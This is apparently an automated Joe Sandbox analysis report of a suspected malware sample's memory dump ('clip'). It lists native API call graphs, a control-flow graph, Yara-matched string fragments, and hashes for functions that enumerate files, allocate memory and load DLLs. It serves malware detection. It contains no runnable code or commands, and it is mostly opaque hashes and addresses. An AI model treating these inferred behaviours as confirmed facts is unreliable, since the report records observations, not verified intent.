NtClose 82705->82707 82708 21b5bb0 3 API calls 82706->82708 82713 21b6242 82707->82713 82709 21b62f8 82708->82709 82712 21b62ff 82709->82712 82738 21b5d80 82709->82738 82711 21b633c 82711->82684 82712->82684 82714 21b5a30 LdrInitializeThunk 82713->82714 82715 21b628d 82714->82715 82716 21c7a20 NtClose 82715->82716 82717 21b6297 82716->82717 82718 21b5a30 LdrInitializeThunk 82717->82718 82718->82706 82720 21c679a 82719->82720 82722 21c67a7 82720->82722 82773 21b1300 82720->82773 82722->82673 82724 21b5bdc 82723->82724 82725 21b5a30 LdrInitializeThunk 82724->82725 82726 21b5c26 82725->82726 82727 21b5cc8 82726->82727 82728 21c74e0 LdrInitializeThunk 82726->82728 82727->82702 82731 21b5c4d 82728->82731 82729 21b5cbf 82730 21c7a20 NtClose 82729->82730 82730->82727 82731->82729 82732 21b5cd4 82731->82732 82733 21c74e0 LdrInitializeThunk 82731->82733 82734 21c7a20 NtClose 82732->82734 82733->82731 82735 21b5cdd 82734->82735 82736 21b5a30 LdrInitializeThunk 82735->82736 82737 21b5cfa 82735->82737 82736->82737 82737->82702 82739 21b5da5 82738->82739 82740 21b5920 2 API calls 82739->82740 82742 21b5dd5 82739->82742 82740->82742 82741 21b6071 82741->82711 82742->82741 82743 21b5a30 LdrInitializeThunk 82742->82743 82751 21b5fd8 82742->82751 82745 21b5f01 82743->82745 82744 21b5a30 LdrInitializeThunk 82746 21b6026 82744->82746 82747 21b5f0c 82745->82747 82745->82751 82764 21b5ae0 82746->82764 82749 21c7a20 NtClose 82747->82749 82753 21b5f16 82749->82753 82750 21c7a20 NtClose 82750->82741 82751->82744 82752 21b6036 82752->82750 82754 21b5a30 LdrInitializeThunk 82753->82754 82755 21b5f61 82754->82755 82756 21c7a20 NtClose 82755->82756 82757 21b5f6b 82756->82757 82758 21b5a30 LdrInitializeThunk 82757->82758 82759 21b5fb6 82758->82759 82760 21b5ae0 LdrInitializeThunk 82759->82760 82761 21b5fc6 82760->82761 82762 21c7a20 NtClose 82761->82762 82763 21b5fd0 82762->82763 82763->82711 82765 21b5b06 82764->82765 82768 21c73e0 82765->82768 82769 21c73fa 82768->82769 82772 4353090 LdrInitializeThunk 82769->82772 82770 21b5b94 82770->82752 82772->82770 82776 21b1320 82773->82776 82789 21b7550 82773->82789 82775 21b1808 82775->82722 82776->82775 82793 21c01b0 82776->82793 82779 21b1521 82780 21caae0 2 API calls 82779->82780 82783 21b1536 82780->82783 82781 21b137e 82781->82775 82796 21ca9b0 82781->82796 82782 21b74f0 LdrInitializeThunk 82785 21b1561 82782->82785 82783->82785 82801 21affa0 82783->82801 82785->82775 82785->82782 82786 21affa0 LdrInitializeThunk 82785->82786 82786->82785 82787 21b168f 82787->82785 82788 21b74f0 LdrInitializeThunk 82787->82788 82788->82787 82790 21b755d 82789->82790 82791 21b757e SetErrorMode 82790->82791 82792 21b7585 82790->82792 82791->82792 82792->82776 82794 21c9840 NtAllocateVirtualMemory 82793->82794 82795 21c01d1 82794->82795 82795->82781 82797 21ca9c6 82796->82797 82798 21ca9c0 82796->82798 82799 21c99b0 RtlAllocateHeap 82797->82799 82798->82779 82800 21ca9ec 82799->82800 82800->82779 82802 21affb6 82801->82802 82805 21c7c90 82802->82805 82806 21c7caa 82805->82806 82809 4352c70 LdrInitializeThunk 82806->82809 82807 21affc2 82807->82787 82809->82807 82810 21b67a0 82811 21b67bc 82810->82811 82814 21b680f 82810->82814 82813 21c7a20 NtClose 82811->82813 82811->82814 82812 21b6938 82815 21b67d7 82813->82815 82814->82812 82816 21b5bb0 3 API calls 82814->82816 82818 21b5bb0 3 API calls 82815->82818 82817 21b6912 82816->82817 82817->82812 82819 21b5d80 4 API calls 82817->82819 82818->82814 82819->82812 82820 21c41e0 82822 21c423a 82820->82822 82821 21c4247 82822->82821 82824 21b69f0 82822->82824 82825 21b6a01 82824->82825 82826 21b69d4 82824->82826 82827 21b69e2 82826->82827 82828 21ba590 9 API calls 82826->82828 82827->82821 82828->82827 82829 21c49e0 82830 21c4a3a 82829->82830 82832 21c4a47 82830->82832 82833 21c2570 82830->82833 82834 21c9840 NtAllocateVirtualMemory 82833->82834 82835 21c25b1 82834->82835 82836 21b3e00 LdrLoadDll 82835->82836 82838 21c26b6 82835->82838 82839 21c25f7 82836->82839 82837 21c2630 Sleep 82837->82839 82838->82832 82839->82837 82839->82838 82840 21c07e0 82841 21c07fc 82840->82841 82842 21c0838 82841->82842 82843 21c0824 82841->82843 82845 21c7a20 NtClose 82842->82845 82844 21c7a20 NtClose 82843->82844 82846 21c082d 82844->82846 82847 21c0841 82845->82847 82850 21c99f0 RtlAllocateHeap 82847->82850 82849 21c084c 82850->82849

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 27 21a9320-21a9721 28 21a9732-21a973e 27->28 29 21a9723-21a972c 27->29 30 21a974f-21a9759 28->30 31 21a9740-21a974d 28->31 29->28 32 21a975b-21a9776 30->32 33 21a9792-21a979c 30->33 31->29 35 21a9778-21a977c 32->35 36 21a977d-21a977f 32->36 34 21a97ad-21a97b6 33->34 37 21a97b8-21a97c4 34->37 38 21a97c6-21a97d7 34->38 35->36 39 21a9790 36->39 40 21a9781-21a978a 36->40 37->34 42 21a97e8-21a97f4 38->42 39->30 40->39 43 21a980a-21a9813 42->43 44 21a97f6-21a9808 42->44 46 21a9829-21a9841 43->46 47 21a9815-21a9827 43->47 44->42 48 21a9852-21a985b 46->48 47->43 49 21a985d-21a9866 48->49 50 21a9873-21a987f 48->50 53 21a9868-21a986b 49->53 54 21a9871 49->54 51 21a9881-21a98a2 50->51 52 21a98a4-21a98ae 50->52 51->50 56 21a98bf-21a98cb 52->56 53->54 54->48 57 21a98cd-21a98e0 56->57 58 21a98e2-21a98eb 56->58 57->56 60 21a9b2b-21a9b32 58->60 61 21a98f1-21a98f8 58->61 64 21a9b38 call 21c9570 60->64 65 21a9bc9-21a9bd5 60->65 62 21a992a-21a9934 61->62 63 21a98fa-21a9928 61->63 68 21a9945-21a994e 62->68 63->61 71 21a9b3d-21a9b41 64->71 66 21a9bfa-21a9c04 65->66 67 21a9bd7-21a9bf8 65->67 70 21a9c15-21a9c21 66->70 67->65 72 21a9950-21a9962 68->72 73 21a9964-21a996d 68->73 74 21a9c38-21a9c42 70->74 75 21a9c23-21a9c36 70->75 76 21a9b5c-21a9b63 71->76 77 21a9b43-21a9b5a 71->77 72->68 79 21a996f-21a998a 73->79 80 21a998c-21a9993 73->80 84 21a9c53-21a9c5a 74->84 75->70 85 21a9b95-21a9b9f 76->85 86 21a9b65-21a9b93 76->86 77->71 79->73 81 21a99b4-21a99be 80->81 82 21a9995-21a99b2 80->82 88 21a99cf-21a99db 81->88 82->80 89 21a9c5c-21a9c81 84->89 90 21a9c83-21a9c8d 84->90 87 21a9bb0-21a9bb9 85->87 86->76 87->65 91 21a9bbb-21a9bc7 87->91 92 21a99e8-21a99fb 88->92 93 21a99dd-21a99e6 88->93 89->84 91->87 97 21a9a0c-21a9a18 92->97 93->88 98 21a9a1a-21a9a2d 97->98 99 21a9a2f-21a9a3e 97->99 98->97 101 21a9a72-21a9a76 99->101 102 21a9a40-21a9a44 99->102 105 21a9a78-21a9aa2 101->105 106 21a9aa4-21a9aae 101->106 103 21a9a6d 102->103 104 21a9a46-21a9a6b 102->104 103->60 104->102 105->101 107 21a9abf-21a9acb 106->107 108 21a9acd-21a9ae0 107->108 109 21a9ae2-21a9af6 107->109 108->107 111 21a9b07-21a9b10 109->111 112 21a9b12-21a9b24 111->112 113 21a9b26 111->113 112->111 113->58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "$#$%EG$*$.$0$6h$=$Fr$I$R$X$a$c$c8$iH$lL$o$q$9$G$P$U$|$~
                                                  • API String ID: 0-4189397141
                                                  • Opcode ID: cf2650882523abe8303c401d9fae68754a68062c4c01f321a870ce308f8d12b9
                                                  • Instruction ID: 560a973c03574f6dab37dc912ea9c78a31a89b82607598cb58acb3b4d4863aa2
                                                  • Opcode Fuzzy Hash: cf2650882523abe8303c401d9fae68754a68062c4c01f321a870ce308f8d12b9
                                                  • Instruction Fuzzy Hash: E342B1B4D45268CFEB24CF44C9A4BEDBBB2BB45308F1081D9C4196B280D7B95AC5CF84
                                                  APIs
                                                  • FindFirstFileW.KERNELBASE(?,00000000), ref: 021BB914
                                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 021BB94F
                                                  • FindClose.KERNELBASE(?), ref: 021BB95A
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: 0a8f3265f11616ba5fd090bd354dd2a31919c513122e96933fc58942e3bf41a1
                                                  • Instruction ID: e572660caf239d9abe958ec6c6408c0eac305cefdb19a07405b43d74859b9e53
                                                  • Opcode Fuzzy Hash: 0a8f3265f11616ba5fd090bd354dd2a31919c513122e96933fc58942e3bf41a1
                                                  • Instruction Fuzzy Hash: 11315CB5980308AEDB61DFA4CC85FEE777C9F44709F104598F959A7180DB70AB858BA0
                                                  APIs
                                                  • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 021C7823
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 1fc552f3599d3cd8c195fa7953c462f38eb244cdd26257c0c67ab286454c148c
                                                  • Instruction ID: fff573924dc5f12833d1beabd363d26fe1e52fb595b0d24520b09f3084efde6e
                                                  • Opcode Fuzzy Hash: 1fc552f3599d3cd8c195fa7953c462f38eb244cdd26257c0c67ab286454c148c
                                                  • Instruction Fuzzy Hash: 7431A3B5A41609AFCB04DF99D881EDFB7F9AF8C314F108219F919A3240D770A951CFA5
                                                  APIs
                                                  • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 021C796B
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: e2446637bc65172a803c8ab91935c505186b4010a65a70dda7ace577cf17de04
                                                  • Instruction ID: 9b651bbd690e1d6969a434aed4598f54620b2384cd8b366163399d8f5ca33538
                                                  • Opcode Fuzzy Hash: e2446637bc65172a803c8ab91935c505186b4010a65a70dda7ace577cf17de04
                                                  • Instruction Fuzzy Hash: A231B5B5A40609AFCB14DF99D881EEFB7B9AF8C314F118219FD19A7240D770A8118FA4
                                                  APIs
                                                  • NtAllocateVirtualMemory.NTDLL(021B137E,?,021C67A7,00000000,00000004,00003000,?,?,?,?,?,021C67A7,021B137E,021C67A7,00000000), ref: 021C7C2D
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateMemoryVirtual
                                                  • String ID:
                                                  • API String ID: 2167126740-0
                                                  • Opcode ID: e56df03c9cb920b1f51dc70473fe90544d1999a5617db69a811e759821e408e5
                                                  • Instruction ID: 361921b9a6c13528dc20c60b35a8b10caa197efb645b4b63d48307c64c408114
                                                  • Opcode Fuzzy Hash: e56df03c9cb920b1f51dc70473fe90544d1999a5617db69a811e759821e408e5
                                                  • Instruction Fuzzy Hash: E821F8B9A40208AFDB14DF59DC81FAFB7A9EF88310F108109FD09A7280D771A911CFA1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 53fc4afead111232fdc41d115ca04acb48d29e3b04916dd05257178245b90efb
                                                  • Instruction ID: fa8ceb321302ac22aea80bc7bc4e9eb8043f24806dc694a4f316f314281b63bd
                                                  • Opcode Fuzzy Hash: 53fc4afead111232fdc41d115ca04acb48d29e3b04916dd05257178245b90efb
                                                  • Instruction Fuzzy Hash: 3A01CB7AA80204BFD220EA68DC42FABB7ADDB84310F004509FA08A7180DBB069018FA1
                                                  APIs
                                                  • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 021C7A54
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2529006519.00000000021A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 021A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_21a0000_clip.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                                                  • Instruction ID: b9fa37bac97201bc5c5299419a904fb0dc9b7c36b2bd3a4aa9a4d2c482c6cec7
                                                  • Opcode Fuzzy Hash: 9cabf88f7ebf607d24702660be94398df66291ecf44b2da18a7e530c6de45284
                                                  • Instruction Fuzzy Hash: 9BE0467A2406047FD620AB6ACC41FDBB7AEDBC9760F818419FA08A7241C671B9108EB0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 51eef8b17505e3968bf2cdd8125458e71e4dc0d447606de87dd136852227c961
                                                  • Instruction ID: ec215133f410541d036fac19ef63a89ffdf26fe51f2a6b0ffbf4af64357e553d
                                                  • Opcode Fuzzy Hash: 51eef8b17505e3968bf2cdd8125458e71e4dc0d447606de87dd136852227c961
                                                  • Instruction Fuzzy Hash: F790027560650502F104715C851470610058BD5215F65E411A4435568D8795DA5165A2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: aebab1183cd6bf45595491687903845c44c7d9f6223dd255b939eb982da766d2
                                                  • Instruction ID: 94a0e1cb76dd1e091663b8167a2e72d16df021b2fd2cdebcc9132829ae64ee2a
                                                  • Opcode Fuzzy Hash: aebab1183cd6bf45595491687903845c44c7d9f6223dd255b939eb982da766d2
                                                  • Instruction Fuzzy Hash: D49002A5602501426144715C880440660059BE6315395E115A4565560C8618D9559269
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5276c14133b8f50ee676f98e326e767f12933a2f5328b6595f11798667f0afa4
                                                  • Instruction ID: fff02aa03c9ef86545a758c0f04f4c8bf992c6bb5f91bc262fbcaad325fe3d15
                                                  • Opcode Fuzzy Hash: 5276c14133b8f50ee676f98e326e767f12933a2f5328b6595f11798667f0afa4
                                                  • Instruction Fuzzy Hash: DF90026524240902F144715CC4147070006CBD5615F55E011A4035554D8616DA6566B1
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 60edd554fa4603b3b9262756c5d17bea9968d5ef4401d7a4293677687825c347
                                                  • Instruction ID: 79c9ea7de480b19a9fb381b8a3697f966aa87f1729989830c1404c7d548cdff3
                                                  • Opcode Fuzzy Hash: 60edd554fa4603b3b9262756c5d17bea9968d5ef4401d7a4293677687825c347
                                                  • Instruction Fuzzy Hash: 7790027560680112B144715C888454640059BE5315B55E011E4435554C8A14DA565361
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1e12fb358b09db8b168c23e8d23e87d2e9643aed344933f3ef2c189b65f354e9
                                                  • Instruction ID: ad9c3ccb3ec8411c25bc50399cc400420bae617ad32e66c488135f55cb593a53
                                                  • Opcode Fuzzy Hash: 1e12fb358b09db8b168c23e8d23e87d2e9643aed344933f3ef2c189b65f354e9
                                                  • Instruction Fuzzy Hash: E790027520248902F114715CC40474A00058BD5315F59E411A8435658D8695D9917121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5b7e9314d4a07e303f1e46f053d95af3acd6b5f9ed6d0bf21c229778d66d32a0
                                                  • Instruction ID: 3a6b4d90d721d4c838830dcb7b3a6dad5993384007d3b72919db3ea1e9f2072c
                                                  • Opcode Fuzzy Hash: 5b7e9314d4a07e303f1e46f053d95af3acd6b5f9ed6d0bf21c229778d66d32a0
                                                  • Instruction Fuzzy Hash: B290027520240942F104715C8404B4600058BE5315F55E016A4135654D8615D9517521
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: ca6c8a61a301853162833baa641c0fb99c943045c678eb39a9be72b553b59613
                                                  • Instruction ID: 9cf6daef2853f8c0a17b9d588509e69bbd261d8df24176a7b7818953cfc13259
                                                  • Opcode Fuzzy Hash: ca6c8a61a301853162833baa641c0fb99c943045c678eb39a9be72b553b59613
                                                  • Instruction Fuzzy Hash: B590027520240502F104759C940864600058BE5315F55F011A9035555EC665D9916131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1665eec6d605b3bff5f10722eddc53f2e681cee4da8e258cc91039c6af3fd4d3
                                                  • Instruction ID: 80f571c26b814d6ea412ee5e0c570637232fa17d14ccf5b3ea4fbaf50bf67fb3
                                                  • Opcode Fuzzy Hash: 1665eec6d605b3bff5f10722eddc53f2e681cee4da8e258cc91039c6af3fd4d3
                                                  • Instruction Fuzzy Hash: A390026530240103F144715C94186064005DBE6315F55F011E4425554CD915D9565222
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 18090f1cfd0d4571d4a149e80515b216b012f5bcdd536e5657aa9b5d85665f88
                                                  • Instruction ID: 9543b36fe7376116455394bfbf01e8fdb41db81f4ca8c9cd42e31f71bf523543
                                                  • Opcode Fuzzy Hash: 18090f1cfd0d4571d4a149e80515b216b012f5bcdd536e5657aa9b5d85665f88
                                                  • Instruction Fuzzy Hash: 1E90026D21340102F184715C940860A00058BD6216F95F415A4026558CC915D9695321
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 242040dbba5c5b49d85b8d54b3a8a6113b81923e553c6bc302511760655c7919
                                                  • Instruction ID: dfb89218ec2ae6aeb285d29e30c04c265b3c5ece47abfc960eb7eedcae49c1fc
                                                  • Opcode Fuzzy Hash: 242040dbba5c5b49d85b8d54b3a8a6113b81923e553c6bc302511760655c7919
                                                  • Instruction Fuzzy Hash: 4190027520240513F115715C850470700098BD5255F95E412A4435558D9656DA52A121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: a67d017f6d28e3f81507c0b27864fdb8952bf069d8de97b3b0e92bf54fca23c1
                                                  • Instruction ID: 9a13144498df42eb02a2a2e5a12af418b3981387debdea691f11620f7dfbeca3
                                                  • Opcode Fuzzy Hash: a67d017f6d28e3f81507c0b27864fdb8952bf069d8de97b3b0e92bf54fca23c1
                                                  • Instruction Fuzzy Hash: 45900265243442527549B15C840450740069BE5255795E012A5425950C8526E956D621
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 2b081f0c0f5834b256be8cf65d4a3ab8735f046ba10edbce9d602a8736e81417
                                                  • Instruction ID: 9a25428c9dc74a708b5c8d478bd7a59c5c4d665f6b1779d9b151a19d3754ce6e
                                                  • Opcode Fuzzy Hash: 2b081f0c0f5834b256be8cf65d4a3ab8735f046ba10edbce9d602a8736e81417
                                                  • Instruction Fuzzy Hash: F190026560240602F105715C8404616000A8BD5255F95E022A5035555ECA25DA92A131
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 11c550e5ad7f6949d2e3005c73672ef786a2a195c7a49e5c843a5ff8510faaf3
                                                  • Instruction ID: 109872819aeca188bc0c3a3766c3f2f2aad9bb70a459bf379c45d630add03dd0
                                                  • Opcode Fuzzy Hash: 11c550e5ad7f6949d2e3005c73672ef786a2a195c7a49e5c843a5ff8510faaf3
